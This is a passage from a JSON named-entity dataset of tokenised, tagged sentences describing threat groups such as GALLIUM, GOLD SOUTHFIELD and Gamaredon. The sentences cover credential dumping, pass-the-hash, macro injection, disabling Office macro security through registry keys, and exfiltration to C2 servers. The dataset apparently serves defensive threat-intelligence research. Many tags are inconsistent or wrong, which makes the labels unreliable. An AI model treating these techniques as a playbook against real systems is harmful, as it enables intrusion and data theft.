"O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "installed", "TightVNC", "server", "and", "client", "on", "compromised", "servers", "and", "endpoints", "for", "lateral", "movement." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "valid", "credentials", "with", "various", "services", "during", "lateral", "movement." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "Amazon", "Web", "Services", "to", "host", "C2." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Tool", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "installed", "web", "shells", "on", "compromised", "hosts", "to", "maintain", "access." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Fox", "Kitten", "has", "used", "cmd.exe", "likely", "as", "a", "password", "changing", "mechanism." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "WinRAR", "to", "compress", "and", "encrypt", "stolen", "data", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "has", "used", "stolen", "certificates", "to", "sign", "its", "tools", "including", "those", "from", "Whizzimo", "LLC." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam" ] }, { "tokens": [ "GALLIUM", "used", "DLL", "side-loading", "to", "covertly", "load", "PoisonIvy", "into", "memory", "on", "the", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "collected", "data", "from", "the", "victim's", "local", "system,", "including", "password", "hashes", "from", "the", "SAM", "hive", "in", "the", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "created", "high-privileged", "domain", "user", "accounts", "to", "maintain", "access", "to", "victim", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "Web", "shells", "and", "HTRAN", "for", "C2", "and", "to", "exfiltrate", "data." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "B-Purp" ] }, { "tokens": [ "GALLIUM", "exploited", "a", "publicly-facing", "servers", "including", "Wildfly/JBoss", "servers", "to", "gain", "access", "to", "the", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "GALLIUM", "used", "a", "modified", "version", "of", "HTRAN", "to", "redirect", "connections", "between", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "GALLIUM", "has", "used", "VPN", "services,", "including", "SoftEther", "VPN,", "to", "access", "and", "maintain", "persistence", "in", "victim", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "ensured", "each", "payload", "had", "a", "unique", "hash,", "including", "by", "using", "different", "types", "of", "packers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "GALLIUM", "dropped", "additional", "tools", "to", "victims", "during", "their", "operation,", "including", "portqry.exe,", "a", "renamed", "cmd.exe", "file,", "winrar,", "and", "HTRAN." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "GALLIUM", "used", "a", "modified", "version", "of", "Mimikatz", "along", "with", "a", "PowerShell-based", "Mimikatz", "to", "dump", "credentials", "on", "the", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "has", "used", "PsExec", "to", "move", "laterally", "between", "hosts", "in", "the", "target", "network." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "compressed", "and", "staged", "files", "in", "multi-part", "archives", "in", "the", "Recycle", "Bin", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "a", "modified", "version", "of", "HTRAN", "in", "which", "they", "obfuscated", "strings", "such", "as", "debug", "messages", "in", "an", "apparent", "attempt", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "dumped", "hashes", "to", "authenticate", "to", "other", "machines", "via", "pass", "the", "hash." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "PowerShell", "for", "execution", "to", "assist", "in", "lateral", "movement", "as", "well", "as", "for", "dumping", "credentials", "stored", "on", "compromised", "machines." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "a", "modified", "version", "of", "NBTscan", "to", "identify", "available", "NetBIOS", "name", "servers", "over", "the", "network", "as", "well", "as", "<code>ping</code>", "to", "identify", "remote", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "a", "renamed", "cmd.exe", "file", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "established", "persistence", "for", "PoisonIvy", "by", "created", "a", "scheduled", "task." ], "ner_tags": [ "B-Org", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "<code>reg</code>", "commands", "to", "dump", "specific", "hives", "from", "the", "Windows", "Registry,", "such", "as", "the", "SAM", "hive,", "and", "obtain", "password", "hashes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "B-Purp", "B-Features" ] }, { "tokens": [ "GALLIUM", "has", "used", "Taiwan-based", "servers", "that", "appear", "to", "be", "exclusive", "to", "GALLIUM." ], "ner_tags": [ "B-Idus", "O", "O", "B-Area", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "GALLIUM", "packed", "some", "payloads", "using", "different", "types", "of", "packers,", "both", "known", "and", "custom." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "<code>ipconfig", "/all</code>", "to", "obtain", "information", "about", "the", "victim", "network", "configuration.", "The", "group", "also", "ran", "a", "modified", "version", "of", "NBTscan", "to", "identify", "available", "NetBIOS", "name", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "<code>netstat", "-oan</code>", "to", "obtain", "information", "about", "the", "victim", "network", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "<code>whoami</code>", "and", "<code>query", "user</code>", "to", "obtain", "information", "about", "the", "victim", "user." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "has", "used", "a", "variety", "of", "widely-available", "tools,", "which", "in", "some", "cases", "they", "modified", "to", "add", "functionality", "and/or", "subvert", "antimalware", "solutions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "leveraged", "valid", "accounts", "to", "maintain", "access", "to", "a", "victim", "network." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "Web", "shells", "to", "persist", "in", "victim", "environments", "and", "assist", "in", "execution", "and", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "the", "Windows", "command", "shell", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "GALLIUM", "used", "WMI", "for", "execution", "to", "assist", "in", "lateral", "movement", "as", "well", "as", "for", "installing", "tools", "across", "multiple", "assets." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "GCMAN", "uses", "Putty", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "GCMAN", "uses", "VNC", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "GOLD", "SOUTHFIELD", "has", "executed", "base64", "encoded", "PowerShell", "scripts", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "GOLD", "SOUTHFIELD", "has", "distributed", "ransomware", "by", "backdooring", "software", "installers", "via", "a", "strategic", "web", "compromise", "of", "the", "site", "hosting", "Italian", "WinRAR." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GOLD", "SOUTHFIELD", "has", "exploited", "Oracle", "WebLogic", "vulnerabilities", "for", "initial", "compromise." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Exp", "O", "B-Exp", "O", "O", "O" ] }, { "tokens": [ "GOLD", "SOUTHFIELD", "has", "used", "publicly-accessible", "RDP", "and", "remote", "management", "and", "monitoring", "(RMM)", "servers", "to", "gain", "access", "to", "victim", "machines." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "B-Tool", "B-Way", "O", "B-Tool", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "GOLD", "SOUTHFIELD", "has", "conducted", "malicious", "spam", "(malspam)", "campaigns", "to", "gain", "access", "to", "victim's", "machines." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "B-OffAct", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "GOLD", "SOUTHFIELD", "has", "staged", "and", "executed", "PowerShell", "scripts", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "GOLD", "SOUTHFIELD", "has", "used", "the", "cloud-based", "remote", "management", "and", "monitoring", "tool", "\"ConnectWise", "Control\"", "to", "deploy", "REvil." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "GOLD", "SOUTHFIELD", "has", "used", "the", "remote", "monitoring", "and", "management", "tool", "ConnectWise", "to", "obtain", "screen", "captures", "from", "victim's", "machines." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GOLD", "SOUTHFIELD", "has", "breached", "Managed", "Service", "Providers", "(MSP's)", "to", "deliver", "malware", "to", "MSP", "customers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O" ] }, { "tokens": [ "Gallmaker", "has", "used", "WinZip,", "likely", "to", "archive", "data", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gallmaker", "attempted", "to", "exploit", "Microsoft’s", "DDE", "protocol", "in", "order", "to", "gain", "access", "to", "victim", "machines", "and", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gallmaker", "sent", "victims", "a", "lure", "document", "with", "a", "warning", "that", "asked", "victims", "to", "“enable", "content”", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gallmaker", "obfuscated", "shellcode", "used", "during", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gallmaker", "used", "PowerShell", "to", "download", "additional", "payloads", "and", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gallmaker", "sent", "emails", "with", "malicious", "Microsoft", "Office", "documents", "attached." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "deployed", "scripts", "on", "compromised", "systems", "that", "automatically", "scan", "for", "interesting", "documents." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "modules", "that", "automatically", "upload", "gathered", "documents", "to", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "obfuscated", ".NET", "executables", "by", "inserting", "junk", "code." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "obfuscated", "or", "encrypted", "scripts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "compiled", "the", "source", "code", "for", "a", "downloader", "directly", "on", "the", "infected", "system", "using", "the", "built-in", "<code>Microsoft.CSharp.CSharpCodeProvider</code>", "class." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Gamaredon", "Group", "malware", "can", "insert", "malicious", "macros", "into", "documents", "using", "a", "<code>Microsoft.Office.Interop</code>", "object." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "tools", "to", "delete", "files", "and", "folders", "from", "victims'", "desktops", "and", "profiles." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "collected", "files", "from", "infected", "systems", "and", "uploaded", "them", "to", "a", "C2", "server." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "malware", "has", "collected", "Microsoft", "Office", "documents", "from", "mapped", "network", "drives." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Gamaredon", "Group", "file", "stealer", "has", "the", "capability", "to", "steal", "data", "from", "newly", "connected", "logical", "volumes", "on", "a", "system,", "including", "USB", "drives." ], "ner_tags": [ "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "tools", "decrypted", "additional", "payloads", "from", "the", "C2.", "Gamaredon", "Group", "has", "also", "decoded", "base64-encoded", "source", "code", "of", "a", "downloader." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "delivered", "macros", "which", "can", "tamper", "with", "Microsoft", "Office", "security", "settings." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "registered", "multiple", "domains", "to", "facilitate", "payload", "staging", "and", "C2." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "incorporated", "dynamic", "DNS", "domains", "in", "its", "infrastructure." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Gamaredon", "Group", "file", "stealer", "can", "transfer", "collected", "files", "to", "a", "hardcoded", "C2", "server." ], "ner_tags": [ "O", "B-Idus", "B-HackOrg", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "tools", "can", "delete", "files", "used", "during", "an", "operation." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "macros", "can", "scan", "for", "Microsoft", "Word", "and", "Excel", "files", "to", "inject", "with", "additional", "malicious", "macros.", "Gamaredon", "Group", "has", "also", "used", "its", "backdoors", "to", "automatically", "list", "interesting", "files", "(such", "as", "Office", "documents)", "found", "on", "a", "system." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "<code>hidcon</code>", "to", "run", "batch", "files", "in", "a", "hidden", "console", "window." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "downloaded", "additional", "malware", "and", "tools", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "left", "taunting", "images", "and", "messages", "on", "the", "victims'", "desktops", "as", "proof", "of", "system", "access." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "an", "Outlook", "VBA", "module", "on", "infected", "systems", "to", "send", "phishing", "emails", "with", "malicious", "attachments", "to", "other", "employees", "within", "the", "organization." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "tested", "connectivity", "between", "a", "compromised", "machine", "and", "a", "C2", "server", "using", "Ping", "with", "commands", "such", "as", "`CSIDL_SYSTEM\\cmd.exe", "/c", "ping", "-n", "1`." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "attempted", "to", "get", "users", "to", "click", "on", "Office", "attachments", "with", "malicious", "macros", "embedded." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "legitimate", "process", "names", "to", "hide", "malware", "including", "<code>svchosst</code>." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Gamaredon", "Group", "has", "removed", "security", "settings", "for", "VBA", "macro", "execution", "by", "changing", "registry", "values", "<code>HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\VBAWarnings</code>", "and", "<code>HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\AccessVBOM</code>." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "`mshta.exe`", "to", "execute", "malicious", "HTA", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "malware", "has", "used", "<code>CreateProcess</code>", "to", "launch", "additional", "malicious", "components." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "delivered", "self-extracting", "7z", "archive", "files", "within", "malicious", "document", "attachments." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "inserted", "malicious", "macros", "into", "existing", "documents,", "providing", "persistence", "when", "they", "are", "reopened.", "Gamaredon", "Group", "has", "loaded", "the", "group's", "previously", "delivered", "VBA", "project", "by", "relaunching", "Microsoft", "Outlook", "with", "the", "<code>/altvba</code>", "option,", "once", "the", "Application.Startup", "event", "is", "received." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "tools", "have", "contained", "an", "application", "to", "check", "performance", "of", "USB", "flash", "drives.", "Gamaredon", "Group", "has", "also", "used", "malware", "to", "scan", "for", "removable", "drives." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "obfuscated", "PowerShell", "scripts", "for", "staging." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "tools", "to", "enumerate", "processes", "on", "target", "hosts", "including", "Process", "Explorer." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Gamaredon", "Group", "tools", "have", "registered", "Run", "keys", "in", "the", "registry", "to", "give", "malicious", "VBS", "files", "persistence." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "malware", "has", "used", "rundll32", "to", "launch", "additional", "malicious", "components." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "created", "scheduled", "tasks", "to", "launch", "executables", "after", "a", "designated", "number", "of", "minutes", "have", "passed." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group's", "malware", "can", "take", "screenshots", "of", "the", "compromised", "computer", "every", "minute." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "delivered", "spearphishing", "emails", "with", "malicious", "attachments", "to", "targets." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Gamaredon", "Group", "file", "stealer", "can", "gather", "the", "victim's", "computer", "name", "and", "drive", "serial", "numbers", "to", "send", "to", "a", "C2", "server." ], "ner_tags": [ "O", "B-Idus", "B-HackOrg", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Gamaredon", "Group", "file", "stealer", "can", "gather", "the", "victim's", "username", "to", "send", "to", "a", "C2", "server." ], "ner_tags": [ "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "injected", "malicious", "macros", "into", "all", "Word", "and", "Excel", "documents", "on", "mapped", "network", "drives." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Way", "B-Purp", "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "DOCX", "files", "to", "download", "malicious", "DOT", "document", "templates", "and", "has", "used", "RTF", "template", "injection", "to", "download", "malicious", "payloads.", "Gamaredon", "Group", "can", "also", "inject", "malicious", "macros", "or", "remote", "templates", "into", "documents", "already", "present", "on", "compromised", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "registered", "domains", "to", "stage", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "VNC", "tools,", "including", "UltraVNC,", "to", "remotely", "interact", "with", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "embedded", "malicious", "macros", "in", "document", "templates,", "which", "executed", "VBScript.", "Gamaredon", "Group", "has", "also", "delivered", "Microsoft", "Outlook", "VBA", "projects", "with", "embedded", "macros." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "HTTP", "and", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "GitHub", "repositories", "for", "downloaders", "which", "will", "be", "obtained", "by", "the", "group's", ".NET", "executable", "on", "the", "compromised", "system." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gamaredon", "Group", "has", "used", "various", "batch", "scripts", "to", "establish", "C2", "and", "download", "additional", "files.", "Gamaredon", "Group's", "backdoor", "malware", "has", "also", "been", "written", "to", "a", "batch", "file." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", 